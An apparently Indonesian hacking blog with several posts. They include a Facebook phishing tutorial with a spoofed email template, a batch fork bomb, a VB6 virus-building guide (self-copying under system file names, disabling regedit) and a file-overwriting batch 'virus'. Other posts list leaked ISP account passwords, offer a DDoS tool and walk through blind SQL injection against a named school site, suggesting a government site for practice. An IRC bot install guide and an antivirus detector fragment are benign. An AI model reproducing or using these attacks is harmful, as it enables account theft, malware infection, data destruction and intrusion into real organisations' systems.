Recent Comments

FBS FOREX

Forex Broker Untuk Pemula

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Space For Ads

Space For Ads
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan

Kamis, 21 November 2013

cara membuat fake login..

berjumpa lagi dengan sayaaa, kali ini saya akan membuat tutorial atau langkah-langkah..
bagaimana cara memebuat fake login/halaman palsu.. tentunyaa teman teman semua udah tau apa itu fake login.. bagi yang belum tau apa itu fake login, monggo di gogling..

nah langsung sajaaa..
langkah pertama:....
1. terlebih dahulu kita buat accound dengan mendaftar di webhosting gratisan yang mendukung/support PHP.. seperti bytehost, atau webhosting lainnyaa..

2. Ekstrak file code.rar dapat di sedot di  sini kemudian simpan atau upload di suatu direktori di webhosting yang telah kita daftar, misal nya http://NamaKita.bytehost.com/facebook/.. di dalam file code.rar berisi file-file antara lain: terdapat 3 file tersebut yaitu: index.html, logs.php dan logs.txt

3. Buatlah email palsu dengan menyamar sebagagi admin facebook tujuannya agar si target/korban yang kita harapkan percaya.. contohnya : admin_facebook@yahoo .com/admin.facebook@gmail .com/ admin.fb@plasa.com

4. Buat isi pesan dengan nama scriptisiemailpalsu. doc


SCRIPT ISI EMAIL PALSU

Keizen mengajak Anda anda berteman di Facebook. Kami perlu memastikan kepada Anda bahwa Anda memang mengenal  Keizen agar Anda bisa berteman di Facebook.

Untuk mengonfirmasi permintaan pertemanan ini, ikuti tautan di bawah ini:
http://www.facebook.com/n/?reqs.php&mid=883451G4a3b0e7eG88f1e5G2 

Terima kasih,
Tim Facebook

___
Pesan ini merujuk ke alamat_email_palsu@gmail.com  Ingin mengatur email apa saja yang Anda terima dari Facebook? Kunjungi:
http://www.facebook.com/editaccount.php?notifications&md=ZnJpZW5kO2Zyb209MTI1Mjg0ODc5Njt0bz0xMjQ1Mzg0MzE4&mid=883451G4a3b0e7eG88f1e5G2 
Kantor Facebook beralamat di 1601 S. California Ave., Palo Alto, CA 94304.

lto, CA 94304.
5. Buka isi file tersebut. Lalu ganti nama keizen ganti dengan nama ente dan ganti alamat_email_anda@gm ail.com dengan alamat palsu entee..

6. Lalu pada URL : http://www.facebook.com/n/?reqs.php&...b0e7eG88f1e5G2 ganti dengan URL halaman fake login yang telah kita buat tadi. contoh http://keizen/fileave.com/index/html

7. Setelah semua sudah kita persiapkan, segera kirim isi pesan tersebut ke alamat email si korban. Maka alamat email + password si korban akan datangan dengan sendiri nya ke email palsu yng kita buat tadii..

adapun beberapa cara yang lain, dan lain waktu nanti akan sayaaa bahas lagii..
karena sayaa masih ada tanggungan mengerjakan PR jadi sampe sekian dluu, nnt kita sambung lagii..

Rabu, 20 November 2013

Bikin hang windows hanya dengan 5 karakter (just 5 bytes of file)


Maaf kalo ini repost saya pun juga lupa kalo saya pernah baca ini dimana intinya LUPA..
Setahu saya ini merupakan  virus yang sedikit simple tapi cukup mematikan,.. :D

okee, langsung sajaaa..
Code:
%0|%0

ketik code tersebut di notepad dengan nama terserah anda.bat (harus menggunakan ekstensi .bat) terus kalo yang berani silahkan di coba.. Saya sendiri sih pernah coba dan komputer/laptop anda akan bawel dengan muncul nya memory peringatan 0x? yang error setiap saat, akibat selanjut nya saya sendiri juga kurang tahuu,.. :))


untuk pengembangannya silahkan digabung sama coding VB, C, Java, Perl, PHP, dan lain2 .. tentunya .BAT juga ..
buat yang hobi ngancurin server orang .. kalo nemu server IIS/windows yang udah ditanemin shell coba aja pake ini .. mungkin si server lgsng !CRASH! hehehehe





Code: 
import java.io.*;
public class ffaaddiill {
   static String m = "cmd /C msg * shinobi_master_was_here";
   public static void main(String []args)throws IOException {
      ffaaddiill zombie = new ffaaddiill();
      Runtime.getRuntime().exec(zombie.m);
   }
}


buat yg males nulis program nya.. monggo lgs sedot aja.. 

Rabu, 06 November 2013

Tips dan Trik Koneksi Speedy

logo speedy
persiapan :
1. account speedy dan passwordnya
2. mental doang





caranya :
1. masuk ke http://store.telkomspeedy.com
2. pilih produk yang ingin di order .
3. tekan tombol "berlangganan konten ini" .
4. masukin account speedy , password speedy , email dan kode keamanan .
5. menyetujui TOS layanan .
6. terus klik tombol "pesan" .
7. setelah itu cek email kalian .

untuk yang mau coba2 saya kasih nih account speedynya .

1. account number : 111707102282@telkom. net
password : 431092

2. account number : 111724100671@telkom. net
password : pncdyb17at

3. account number : 111717101385@telkom. net
password : 123456

4. account number : 111706100770@telkom. net
password : suharto

5. account number : 111801105041@telkom. net
password : jksfkc09oe

sekian tips dan trick dari saya . jika ada salah kata mohon maaf .

Senin, 04 November 2013

Teknik dasar pembuatan virus dari vb6

kali ini aku kan mau share cara pembuatan virus pada vb6
kali nie aku ada 8 teknik dasar dalam pembuatan virus
tapi ini si peling simpel dari pada yang lain.

Tutor ini hanyalah merupakan suatu pembelajaran,
yangg berupa konsep dasar dalam pembuatan virus di visual basic
jadi pada dasarnya syntax dibawah ini
nantinya akan kalian kembangkan seprti apa yg kalian inginkan virusnya
ok langsung aja gan

Pertama, bikin form buat virus kamu pake Standart exe saja

1. menyembunyikan Form

Private Sub Form_Load()
App.TaskVisible = False
End Sub


2. Copy Diri Sendiri
Misalnya mau dikopiin ke direktori C:\Windows dengan nama winlogon.exe csrss.exe ato services.exe
biar prosesnya sulit di kill pake taskmanager, nama virus pake nama system pada windows

On Error Resume Next
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\winlogon.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\csrss.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\services.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\smss.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\lsass.exe”


3. Bikin Direktori ato folder
Misalnya bikin folder di windows direktori

On Error Resume Next
MkDir “C:\WINDOWS\virus”

4. Mengganti Atribut file
Bisa juga buat ngganti atribut folder

Attributes = 0 0 berarti normal
Attributes = 1 1 berarti read only
Attributes = 2 2 berarti hidden
Attributes = 3 3 berarti read only + hidden
Attributes = 4 4 berarti system
Attributes = 5 5 berarti system + read only
Attributes = 6 6 berarti system + hidden

Set sembunyi = CreateObject(”Scripting.FileSystemObject”)
On Error Resume Next
sembunyi.GetFile(”C:\WINDOWS\winlogon.exe”).Attrib utes = 2
sembunyi.GetFile(”C:\WINDOWS\csrss.exe”).Attribute s = 2
sembunyi.GetFile(”C:\WINDOWS\services.exe”).Attrib utes = 2
sembunyi.GetFile(”C:\WINDOWS\smss.exe”).Attributes = 2
sembunyi.GetFile(”C:\WINDOWS\lsass.exe”).Attribute s = 2

tapi kalo folder pakenya
sembunyi.GetFolder(”C:\WINDOWS\”).Attributes = 2

5. Bikin Pesan Virus
Bikin pesen pake text file

On Error Resume Next
Set bikinpesen = CreateObject(”Scripting.FileSystemObject”)
Set isipesen = bikinpesen.Createtextfile(”C:\baca saya.txt “)
isipesen.writeline (”komputer kamu kena virus bodoh “)
isipesen.Close

6.Ngubah Registry
Misalnya mo disable regedit

On Error Resume Next
Set ubahreg = CreateObject(”WScript.Shell”)
ubahreg.regwrite “HKEY_CURRENT_USER\software\
microsoft\windows\currentversion\policies\system\
disableregistrytools”, 1, “REG_DWORD”

7.Menghapus Registry

Misalna mo ngehapus HKEY_LOCAL_MACHINE\
Software\Microsoft\Windows NT\CurrentVersion\Run\ServLogon

jadi nya seperti ini:
On Error Resume Next
Set hapusreg = CreateObject(”WScript.Shell”)
hapusreg.regdelete “HKEY_LOCAL_MACHINE\
Software\Microsoft\Windows NT\CurrentVersion\Run\ServLogon”

Segala Kerusakan  saya tidak bertanggung jawab.. saya cuma share.. :D

Jumat, 01 November 2013

Variasi Tehnik Hacking Web

Terdapat beberapa cara untuk criminal dapat mengancam jaringan web. Berikut list beberapa aksi teknik hacking :

Reconnaissance
Dalam teknik ini, criminal dapat memperoleh informasi mengenai target system, termasuk username, password, parameter input, program atau bahasa script, tipe server, dan system operasi.

Probe
Dalam fase ini criminal mendeteksi kelemahan system SQL injection termasuk dalam teknik ini dan banyak digunakan untuk menemukan hal tersembunyi dan lubang keamanan yang ada.

Toehold
Criminal akan memproses fase ini ketika penyusup masuk ke dalam system, membangun koneksi, biasanya menyerang session, mencari informasi system dan mulai mengeksploitasi kelemahan keamanan.

Advancement
Fase ini criminal akan mencari konfigurasi error dan mengubah ke account user yang masih unprivileged menjadi priilege, atau bergerak dari normal user dengan sedikit izin akses menjadi administrator, dimana setelah itu criminal akan mendapatkan full akses untuk membuat, menghapus, memodifikasi, menerima atau memindahkan file dan informasi.

Stealth
Langkah stealth ini berupa penyamaran keberadaan penyusup yang sudah masuk ke system. Langkah tersebut dilakukan dengan mengakses dan memodifikasi log file untuk menghilangkan bukti yang dapat memberitahukan user mengenai serangan tersebut.

Listening Port
Dalam listening port tersebut, penyusup akan mengeset backdoor, yakni program jahat yang akan memastikan aktivitas selanjutnya tidak bisa dilakukan. Program itu dinamakan stealth, atau tool backdoor, atau sniffer. Selain itu, penyusup juga dapat memberikan informasi yang salah ketika user mengakses file dan memproses jaringan system, dengan tujuan untuk menyamarkan keberadaan user.

Takeover
Digunakan untuk memperluas control dari satu system ke system lain di jaringan yang sama. Penyusup dapat menggunakan sniffer untuk mendeteksi informasi di host lain, seperti username dan password. Step ini dapat digunakan untuk menemukan host computer yang belum terkena hack sehingga penyusup dapat mengakses host lain. Step ini umumnya dilakukan dengan bahasa pemrograman yang simpe dan dikontrol oleh programmer.

Smogar Bermanfaat..
Monggo yang lain di gogel aja karena saya jg nda mau hanya nulis di tangkep polisi nanti.. :D

Blind SQL

BLIND SQL INJECTION
 buat temen2 yg belum tau apa itu SQL-Injection bisa di baca2 dulu di sini.. monggoo


kembali lagi akh.. wkwkwkwk..

mari kita membahas tentang Blind SQL Injection..

Apa sich Blind SQL Injection tu?

Blind SQL Injection adalah salah satu tehnik exploitasi database yang berbeda dengan sql injection biasa dimana pada sql injection biasa akan mengeluarkan sebuah value akan tetapi pada tehnik blind sql injection tidak akan mengeluarkan value apapun akan tetapi kita akan mengetahui value tersebut dengan trial and error akan value tersebut / menguji true atau falsenya value tersebut...

disini GT memakai command :

mid()= hampir sama fungsinya dengan substring()
char()= adalah peubah dari karakter

lanjut..

ingat..sebelum mencoba,kita cek version sql nya..cara cek ada d tutorial sql inject yg satu lg..
kalau version 4..kita memakai blind,karena v4 tidak support query information_schema

kalau version 5,boleh pake ini,boleh pake sql inject yg biasa..wkwkwkw

lanjut...

Target: www.smanti.com (thx to bejamz udah ngasih target :)

1.PENGETESAN BUG

Seperti biasa..ikuti langkah sebelumnya,seperti di tutorial SQL Inject biasa..cari halaman yng dinamis,sisipkan and 1=0 dan and 1=1


www.smanti.com/berita.php?id=5 and 1=0 <<<false

www.smanti.com/berita.php?id=5 and 1=1 <<<true

eh ternyata ada bug nya...

lanjut....

2.BLIND INJECT

Query yg dipakai: and mid(user(),1,1)=CHAR(65)

saya jelaskan sedikit deh..

mid(user()1,1) = dalam kasus ini kita tidak tahu value dari user itu apa maka dalam "()" kita kosongkan dan angka 1,1 dibelakang () adalah urutan dari value tersebut

sedangkan CHAR adalah peubah dalam decimal dan (65) adalah value decimal tersebut.
kenapa kita mulai dengan 65 ?
karena "65" adalah "A" dalam ascii...

lanjut..

mari kita masukkan

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(65)

ternyata hasilnya masih false (beritanya hilang)

berarti value yg kita masukkan salah..

tinggal tambah value na..jadi..

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(66) <<masih false

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(67) <<masih false

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(68) <<masih false

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(69) <<masih false juga..

dst sampe kita menemukan keadaan true(beritanya muncul kembali)

kebetulan ada di char(83)

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(83)  <<akhirnya true..

cape?masih kuat?hahaha..trial n error...

lanjut..

kita tambain value na..

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,65)

adakah perbedaan nya?

yap,angka pada user kita naikkan menjadi 2 dan kita menambahkan value char kembali,dari 65..

gini nih..

1,1 = value pertama user
1,2 = value kedua user
1,3 = value ketiga user
dst
dan 83 adalah nilai true,lalu kita tambahkan..

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,65)

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,66)

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,67)

dst.. sampe dpet yg true..

ternyata yg true ngumpet di value 77

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,77)


lanjutin trus langkah2na..

cari value k 3 user..

www.smanti.com/berita.php?id=5 and mid(user(),1,3)=CHAR(83,77,65)

eh langsung ktemu..hehehe..

lanjut value k 4..

www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,65)


www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,66)


www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,67)

ternyata ktemu di value 78..

www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,78)

lanjut trus aja...

cape gw..


pokoknya..setelah dapet smua..kita convert char yang tadi di ke ascii table

www.piclist.com/techref/ascii.htm

stelah d convert,ternyata 83 77 65 78 tuh d ascii adalah SMAN

nah udah hampir ktebak user name nya..kerjain ndiri y..okey

nah..gmana kalo mw dapet password na?

kita rubah value
user() menjadi database() dan ulangi tahap2 diatas hingga mendapat semua value yang true..

jadi


www.smanti.com/berita.php?id=5 and mid(database(),1,1)=CHAR(65)

cari lagi..sama kayak cari user tadi..harus sabar..

ulangi sampai dapat true ..

tambain value na..wkwkwkw..

dan rubah value database() untuk mencari value lainnya..

hingga mendapat admin password dan db password
.
metode blind sql injection seperti ini membutuhkan kesabaran dan ketelitian attacker untuk mendapatkan value yg tepat..(true)

akan tetapi metode ini hingga sekarang cukup efektif untuk web yang telah menfilter celah sql injection...hehehe...

okey sampe sini aja ah..cape ngetik..wkwkwkw

slamat mencoba..


buat latihan>> www.dkp.go.id/content.php?c=5161 (ingat woi, web negara inii wkwkwk)

Smoga Bermanfaat..

Rabu, 30 Oktober 2013

Tutorial Shell,Eggdrop,PsyBNC for IRC

Nah, Sekarang kita mau ngomongin seluk beluk shell nih, khususnya shell yang dipergunakan untuk kepentingan IRC. Sebelumnya tau ga Shell itu apa?
Shell adalah program khusus yang digunakan sebagai interface antara user dengan kernel.
Lalu apa itu kernel??
Kernel merupakan inti suatu operating system. Secara sederhananya, kernel berfungsi sebagai penghubung antara hardware dengan software yang berjalan pada suatu operating sistem. Kernel di load ke memory saat booting dan berfungsi me-manage system sampai system di shutdown.
Kembali ke masalah shell. Shell merupakan utilitas program yang berjalan saat user log on ke komputer. Shell mengijinkan user untuk berinteraksi dengan kernel dengan cara menginterpretasikan perintah yang diketikkan pada shell.
Ketika command diketikkan, shell bertanggung jawab untuk memparsing command line, meridirect,dan mengeksekusi command tersebut. Command-command yang diketikan bisa ditulis dalam suatu file (Script file) dengan memanfaatkan shell programing. (sbr:Aceh Forum)
Selebihnya cari aja di google yha…
Sekarang mungkin dah ga asing lagi dengan nama Shell, apalagi bagi mereka yang hobby dengan chatting melalui IRC/mIRC. Nah bagaimana cara mendapatkan shell itu? bagi sebagian orang yang berkecukupan mungkin dapat membelinya secara online, tp bagi yang masih belajar ataupun coba-coba bahkan bagi mereka yang malas mengeluarkan uangnya untuk membeli hal seperti ini (seperti penulis :p) anda dapat mendapatkannya secara gratis, dan tentu saja untuk GRATISAN masih ada kekurangannya atau dibatasi pemakaiannya, ataupun dengan syarat yang cukup sulit bagi mereka yang tidak mempunyai koneksi unlimited.
Jujur saja, saya sebenarnya masih sangat awam tentang ini, dan saya baru mendapatkan access shell baru kemarin semenjak tulisan ini diterbitkan, saya menggunakan shell gratisan dari —-not for publish—- (terima kasih bang Awie a.k.a Angin on irc.relaychat.net #id untuk infonya), prosesnya sangat simple, ±10 menit setelah signup akan ada konfirmasi username/pass untuk login ke shell dengan cara download putty / cygwin nah simple kan?!!
Berhubung shell disini berorientasi untuk IRC, selanjutnya untuk pemakaian shell sebagai Bot IRC, kita harus menginstall EggDrop atau PsyBNC ke dalam shell itu(cari artinya masing² ya di Google), ok tanpa perlu panjang lebar saya coba paparkan sedikit masing-masing cara menginstallnya :
Installasi EggDrop
1. Download file eggdropnya di sini dibagian eggdrop file
systrojan@inferno:~$ wget ftp://ftp.eggheads.org/pub/eggdrop/source/1.6/ eggdrop 1.6.18.tar.gz--06:16:05--  ftp://ftp.eggheads.org/pub/eggdrop/source/1.6 /eggdrop1.6.10.tar.gz=> `eggdrop1.6.10.tar.gz'Resolving ftp.eggheads.org... done.

Connecting to ftp.eggheads.org[207.195.39.240]:21... connected.

Logging in as anonymous ... Logged in!

==> SYST ... done.    ==> PWD ... done.

==> TYPE I ... done.  ==> CWD /pub/eggdrop/source/1.6 ... done.

==> PORT ... done.    ==> RETR eggdrop1.6.10.tar.gz ... done.

Length: 893,527 (unauthoritative)100%[===================================== ================>]

893,527      470.65K/s    ETA 00:00

06:16:07 (470.65 KB/s) - `eggdrop1.6.10.tar.gz' saved [893527]

systrojan@inferno:~$
2. Setelah itu di ekstrak filenya dengan menggunakan perintah tar
systrojan@inferno:~$ tar -zxvf eggdrop1.6.10.tar.gz....

eggdrop1.6.18/src/mod/woobie.mod/woobie.c

eggdrop1.6.18/text/

eggdrop1.6.18/text/CONTENTS

eggdrop1.6.18/text/banner

eggdrop1.6.18/text/motd

eggdrop1.6.18/configure

eggdrop1.6.18/configure.in

systrojan@inferno:~$
3. Masuk ke folder hasil extractnya
systrojan@inferno:~$ cd eggdrop1.6.18systrojan@inferno:~$ [~/eggdrop1.6.18]#
4. Lalu configure sesuai sistemnya
systrojan@inferno [~/eggdrop1.6.18]# ./configureThis is Eggdrop's GNU configure  script.It's going to run a bunch of strange tests to hopefully

make your compile work without much twiddling.

checking for gcc... gcc

checking for C compiler default output... a.out

checking whether the C compiler works... yes

...

...

onfig.status: creating src/mod/Makefile

config.status: creating config.h

creating lush.h

Configure is done.

Type 'make config' to configure the modules, or type 'make iconfig'

to interactively choose which modules to compile.

After that, type 'make' to create the bot.

systrojan@inferno [~/eggdrop1.6.18]#
5.Lalu buat confignya dengan make config
systrojan@inferno [~/eggdrop1.6.18]# make configdetecting modules.................... done.

calculating dependencies................... done.

building ./src/mod/Makefile... done.

make[1]: Entering directory `/home/eggdrop/eggdrop1.6.18/src/mod'Configuring  module compress ...

running in eggdrop mode.

creating cache ../../../config.cache

....

....

creating ./config.status

creating Makefile

make[1]: Leaving directory `/home/eggdrop/eggdrop1.6.18/src/mod'

building ./src/mod/Makefile... done.

You can now compile the bot, using "make".

systrojan@inferno [~/eggdrop1.6.18]#
6. Lalu di make supaya menghasil file binary
systrojan@inferno [~/eggdrop1.6.18]# makemake[1]: Entering directory  `/home/eggdrop/eggdrop1.6.18/src'

(This may take a while.  Go get some runts.)

gcc -pipe -g -O2 -Wall -I.. -I.. -DHAVE_CONFIG_H   -c bg.c

gcc -pipe -g -O2 -Wall -I.. -I.. -DHAVE_CONFIG_H   -c botcmd.c

...

...

make[1]: Leaving directory `/home/eggdrop/eggdrop1.6.18/src/mod'modules made:

-rwxr-xr-x    1 eggdrop  eggdrop      8112 Apr 17 06:23 assoc.so

-rwxr-xr-x    1 eggdrop  eggdrop     13852 Apr 17 06:23 blowfish.so

-rwxr-xr-x    1 eggdrop  eggdrop     97756 Apr 17 06:23 channels.so

-rwxr-xr-x    1 eggdrop  eggdrop      9808 Apr 17 06:23 compress.so

-rwxr-xr-x    1 eggdrop  eggdrop      8704 Apr 17 06:23 console.so

-rwxr-xr-x    1 eggdrop  eggdrop      7612 Apr 17 06:23 ctcp.so

-rwxr-xr-x    1 eggdrop  eggdrop     13724 Apr 17 06:23 dns.so

-rwxr-xr-x    1 eggdrop  eggdrop     93092 Apr 17 06:23 filesys.so

-rwxr-xr-x    1 eggdrop  eggdrop    118620 Apr 17 06:23 irc.so

-rwxr-xr-x    1 eggdrop  eggdrop     25212 Apr 17 06:23 notes.so

-rwxr-xr-x    1 eggdrop  eggdrop     12188 Apr 17 06:23 seen.so

-rwxr-xr-x    1 eggdrop  eggdrop     57052 Apr 17 06:24 server.so

-rwxr-xr-x    1 eggdrop  eggdrop     42972 Apr 17 06:24 share.so

-rwxr-xr-x    1 eggdrop  eggdrop     32980 Apr 17 06:24 transfer.so

-rwxr-xr-x    1 eggdrop  eggdrop      6748 Apr 17 06:24 uptime.so

-rwxr-xr-x    1 eggdrop  eggdrop     12312 Apr 17 06:24 wire.so

Now run "make install" to install your bot.

systrojan@inferno [~/eggdrop1.6.18]#
7.Sekarang tinggal kita make install untuk membuat file eggdrop binarynya
ada dua cara yaitu make install atau make install DEST=/path/tempat/install
kalau make install maka langsung ditaruh di /home/usernamenya/eggdrop
systrojan@inferno [~/eggdrop1.6.18]# make installEggdrop v1.6.18 (C) 1997 Robey  Pointer (C) 2006 EggheadsInstalling in directory: '/home/eggdrop/eggdrop'.

Creating directory: /home/eggdrop/eggdrop.

mkdir /home/eggdrop/eggdrop

...

...

...

make[1]: Leaving directory `/home/eggdrop/eggdrop1.6.18/scripts'

Installation completed.

You MUST ensure that you edit/verify your configuration file.

Use one of the three configuration files (eggdrop.simple.conf,

eggdrop.advanced.conf and eggdrop.complete.conf) distributed

with your bot.

Remember to change directory to /home/systrojan/eggdrop before you proceed.

systrojan@inferno [~/eggdrop1.6.18]#
Selesai sudah install eggdropnya
Sekarang tinggal configurasi botnya, untuk mengedit eggdrop.conf kita
memerlukan pico editor(semacam notepad pada windows) dengan cara :
systrojan@inferno:~/eggdrop$ pico eggdrop.conf
Nah setelah kebuka
GNU nano 2.0.2 File: eggdrop.conf
disini kita harus membaca terlebih dahulu apa saja isinya, termasuk langkah untuk mengeditnya, dapat kita lihat disana, ada beberapa yang kita harus hilangkan tanda “#” untuk mengaktifkan command pada access bot tersebut sesuai kebutuhan, dan perlu diingat “kita harus cukup teliti mengedit file.conf ini agar pada saat compilingnya tidak ada bentuk error”. Dan yg terpenting, di bagian awal pico editor kita hapus :
#! /path/to/executable/eggdrop
..
..
..
# More detailed descriptions of all these settings can be found in
# doc/settings/.
Hasilnya pada bagian awal .conf tersebut kita lihat :
##### BASIC SETTINGS #####
# This setting defines the username the bot uses on IRC. This setting has
# no effect if an ident daemon is running on your bot’s machine.
set username “lamest”
Dan juga kita hapus yang ada tulisan :
die “Please make sure you edit your config file completely.”
Nah sisanya anda tinggal ubah sesuai data yang diinginkan, namun ada satu yang saya masih contek, yaitu pada Channels Module, disana tertera commentar yg cukup banyak, dan tugas anda hapus comment tersebut dan ganti dengan contoh seperti ini :
}
channel add #main {
chanmode “+nt-likm”
idle-kick 0
stopnethack-mode 0
flood-chan 10:60
flood-deop 3:10
flood-kick 3:10
flood-join 5:60
flood-ctcp 3:60
flood-nick 5:60
}
channel set #main +enforcebans +dynamicbans +userbans
channel set #main +dynamicexempts +userexempts +dynamicinvites +userinvites
channel set #main -autoop -bitch +protectops +protectfriends +dontkickops
channel set #main +greet +statuslog
channel set #main +revenge +autovoice
channel set #main -secret -shared -cycle
channel set #main -inactive +seen +nodesynch
#### SERVER MODULE ####
So tau kan batasan mana yang kita harus hapus dan diganti !!!
Setelah selesai editingnya, kluar dari pico editor dengan ketik : [ctrl+x] -> (y)yes -> enter(tdk usah menggati nama eggdrop.conf.
Untuk compilingnya, kita gunakan perintah : ./eggdrop -m eggdrop.conf
Apabila masih ada error anda dapat kembali ke pico editor dan memperbaikinya, apabila ada masalah dalam memperbaikinya, anda dapat share langsung disini atau sebelumnya anda dapat melihat bentuk default eggdrop.conf disini
Nah kurang lebih seperti itu yang bisa saya share pengetahuannya, sisanya anda dapat berlatih sendiri dengan batuan Master Google.
Instalasi PsyBNC
Apasih PsyBNC itu? Bagi yang dah lama malang melintang di dunia irc pasti tau tuh apa PsyBNC , PsyBNC adalah salah satu Irc Bouncer yang sangat mudah digunakan , dan mendukung multi user.
  1. Silahkan login ke shell account kamu.
  2. Download psybnc nya dari sini nih ambil yang versi terbaru yah )
    $ wget http://psybnc.net/psyBNC-2.3.2-7.tar.gz
  1. Extrax file psybnc yang sudah di download tadi.
    $ tar -zxvf psyBNC-2.3.2-7.tar.gz
  1. masuk ke folder psybnc
    $ cd psybnc
  1. Make
    $ make
  1. Edit file psybcn.conf pakai editor kesukaan kamu, vi, nano, pico terserah deh mana yang di sukai , saya sendiri lebih suka menggunakan pico, tapi sayang server saya belum sempat di install pico, jadi pakai vi aja
    $ vi psybnc.conf
    maka muncul seperti ini, tekan i untuk edit setelah edit selesai tekan tombol “esc” yang di pojok kiri atas tuh , untuk menyimpan tekan :wq
    PSYBNC.SYSTEM.PORT1=31337 #<— ganti dengan port yang kamu inginkan misalnya 17485
    PSYBNC.SYSTEM.HOST1=*
    PSYBNC.HOSTALLOWS.ENTRY0=*;*
  1. Psybnc sudah siap di jalankan.
    $ ./psybnc
    .-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
    ,—-.,—-.,-. ,-.,—.,–. ,-.,—-.
    | O || ,-’ \ \/ / | o || \| || ,–’
    | _/ _\ \ \ / | o< | |\ || |__
    |_| |____/ |__| |___||_| \_| \___|
    Version 2.3.2-7 (c) 1999-2003
    the most psychoid
    and the cool lam3rz Group IRCnet
    `-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-’
    Configuration File: psybnc.conf
    Language File: psyBNC Language File – English
    No logfile specified, logging to log/psybnc.log
    Listening on: 0.0.0.0 port 17485
    psyBNC2.3.2-7-cBtITLdDMSNp started (PID 22774)
  1. Okeh psybnc sudah berjalan di server kita silakan buka mirc kamu dan konek ke psybnc kamu sesuai dengan port nya tadi. untuk pertama kali memakai anda perlu setting identd di mirc kamu, terus di inget soalnya identd itu yang dipakai selama konek ke psybnc, klo anda nanti mau konek lagi dengan identd yang berbeda tidak akan bisa
  2. Setelah berhasil konek silahkan baca help nya disini

Belajar Bikin Virus

wkwk.. iseng2 bro.. mari dicoba..tp kerusakan akibat coba2 aku g tanggung jawab lho ya.. cuma ising aja.. :p

PHP Code:
@echo offfor /r "D:\" %%a in (*.doc *.xls *.ppt *.wav *.mp3 *.jpg *.jpeg *.avi *.gif *.txt *.mp4 *.html *.bmp *.exe *.docx *.png *.ico *.rar *.3gp *.flv *.avi *.mkv *.srt *.dll) do (
   copy %0 "
%%~rahasia.bat" && attrib +s +h "%%~fa"
)
@echo off 




save dengan "namafile".bat (hilangkan "")
jangan lupa bawah nya all files

ini merusak file *.doc *.xls *.ppt *.wav *.mp3 *.jpg *.jpeg *.avi *.gif *.txt *.mp4 *.html *.bmp *.exe *.docx *.png *.ico *.rar *.3gp *.flv *.avi *.mkv *.srt *.dll yang ada didalam local disk D
dan membua file rahasia.bat di disk D
secara sembunyi" menanti..

 kl berminat download script ny silahkan klik di sini.. INGAT!! SEGALA BENTUK KERUSAKAN SAYA TIDAK BERTANGGUNG JAWAB


Senin, 28 Oktober 2013

Tools buat DDoS

Buat Temen2 yg males scripting tapi pengen melakukan DDoS saya sudah siapkan piranti nya nih...
Silahkan.. DOWNLOAD

kl mau request tools laen sms aja ke 085643039200

Minggu, 27 Oktober 2013

Mendeteksi Virus Alman

Kalian udah tau kan apa itu virus ALMAN ?
ya tu virus di kategorikan virus berbahaya,virus ini bisa meng-injeksi file dengan extensi ".exe,.dll"

file yang udah terinfeksi otomatis berubah menjadi file zombie karena pada file itu sudah disisipi kode virus agar saat file yang terinfeksi di jalankan,kode virus itu juga ikut di jalankan .

bagi agan" developer antivirus,mendeteksi virus alman juga tidak menggunakan cara yang biasa seperti menggunakan checksum
( Md5,Crc32,SHA256,dll )

kalau masih nekat mau make checksum andai saja 2 byte kegeser juga udah ga akan ke detect lagi file nya

karena file yang akan di infeksi si virus kan akan selalu beda ukurannya,ga akan mungkin sama.
so jalan keluar nya adalah menggunakan heuristic,
walaupun heuristic yang bakal ane share disini masih menggunakan metode read string,tapi cara ini ane akuin ampuh buat mendeteksi alman Variant A & B
algoritma nya begini :
Awalnya besar file yang ingin di check di hitung dulu,
apabila file yang akan di check besar nya file nya > 40 KB file di buka lalu di baca isinya dan dicek apakah file nya mengandung string yang tersimpan pada program pendeteksi alman tersebut.
dengan posisi dari ( Besar file terinfeksi - 40 Kb ) & string dalam file sama dengan string yang tersimpan, ini file sudah pasti di infeksi oleh alman


Langsung ajaa yok, TKP..
pertama buka dulu program visual basic nya ,

lalu tambahkan :
1 Buah command button
1 Buah Text Box



masukan code ini pada form
Private Function CekSiAlman(Dimana As String) As Boolean
On Error Resume Next
Static TextExenya As String
Static GedeFileNya As Long
GedeFileNya = FileLen(Dimana)
If GedeFileNya > 40970 Then
    TextExenya = MariMembaca(Dimana)
    If InStr(TextExenya, "¯EI5œ‚ÞùWç‘Ï") > (GedeFileNya - 40970) Then 'lalu balikan jadikan fungsi ceksialman menjadi true
        CekSiAlman = True
    Else
        CekSiAlman = False
    End If
Else
    CekSiAlman = False
End If
End Function

Private Function CekSiAlmanB(Dimana As String) As Boolean
On Error Resume Next
Static TextExenya As String
Static GedeFileNya As Long
GedeFileNya = FileLen(Dimana)
